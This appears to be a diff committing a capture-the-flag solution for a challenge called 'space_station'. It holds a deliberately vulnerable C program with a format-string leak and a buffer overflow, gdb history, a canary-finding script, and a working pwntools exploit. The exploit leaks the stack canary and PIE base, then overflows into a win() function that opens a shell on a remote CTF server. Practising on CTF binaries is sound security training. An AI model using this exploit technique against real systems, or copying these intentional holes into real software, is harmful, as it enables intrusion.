Second CTFs part

canary/03_space_station/.gdb_history

@@ -0,0 +1,27 @@
+r
+disass vuln
+b *0x000055555555534e
+r
+quit
+disass vuln
+b vuln
+r
+n
+n
+disass vuln
+b *0x000055555555535e
+disass vuln
+n
+c
+disass main
+n
+disass main
+disass vuln
+disass init
+disass start
+quit
+disass vuln
+disass main
+disass vuln
+disass main
+quit

canary/03_space_station/find_canary.py

@@ -0,0 +1,20 @@
+#!/usr/bin/env python3
+from pwn import *
+import re
+
+elf = context.binary = ELF("./space_station", checksec=False)
+
+#p = process(elf.path)
+context.log_level='warn'
+offset = 0x139e
+for i in range(35):
+    p = process(elf.path)
+    p.recvline()
+    p.sendline(f"%{i}$lx") 
+    val = p.recvline().split(b":")[1].strip()
+    print(f"Pos:{i} Value: {val}")
+    if( val[-2:] == b"00"):
+        print(f"Possible canary: {val} at position: {i}")
+    p.shutdown()
+
+#p.interactive()

canary/03_space_station/main.c

@@ -0,0 +1,33 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void setup() {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void win() {
+    printf("Mission accomplished! Opening airlock:\n");
+    system("/bin/sh");
+}
+
+void vuln() {
+    char buf[64];
+    
+    printf("Enter your astronaut ID: ");
+    read(0, buf, 63);
+    buf[63] = '\0';
+    printf(buf);
+    
+    printf("\nSubmit your mission log: ");
+    read(0, buf, 256);
+}
+
+int main() {
+    setup();
+    printf("Welcome aboard the Space Station!\n");
+    vuln();
+    return 0;
+}

canary/03_space_station/solve.py

@@ -0,0 +1,41 @@
+#!/usr/bin/env python3
+import re
+
+from pwn import *
+
+CANARY_POS = 15
+RETURN_POS = 17  # (Seen from the find_canary script and gdb rel value)
+CANARY_OFF = 72
+# Next instruction after the main() calls vuln()
+main_rel = 0x139E  # Relative address after the vuln call in main
+win_rel = 0x1275
+elf = context.binary = ELF("./space_station", checksec=False)
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13583)
+
+p.sendline(f"%{CANARY_POS}$lx.%{RETURN_POS}$lx".encode())
+p.recvline()
+rawout = p.recvline().split(b":")[1].strip()
+canary_raw = rawout.split(b".")[0]
+ret_raw = rawout.split(b".")[1]
+
+canary = int(canary_raw, 16)
+# Return address on the stack of the vuln() function
+ret = int(ret_raw, 16)
+# Base address end with three 000 because is the beginning of a memory page
+base_addr = ret - main_rel
+print(f"{p64(canary)} and {p64(base_addr)}")
+print(f"Base address: {hex(base_addr)}")
+payload = flat(
+    b"A" * CANARY_OFF,
+    p64(canary),
+    b"B" * 8,
+    p64(base_addr + 0x000000000000101A),  # ret gadget
+    p64(base_addr + win_rel),
+)
+p.send(payload)
+print(p.recvline())
+print(p.recvline())
+
+p.interactive()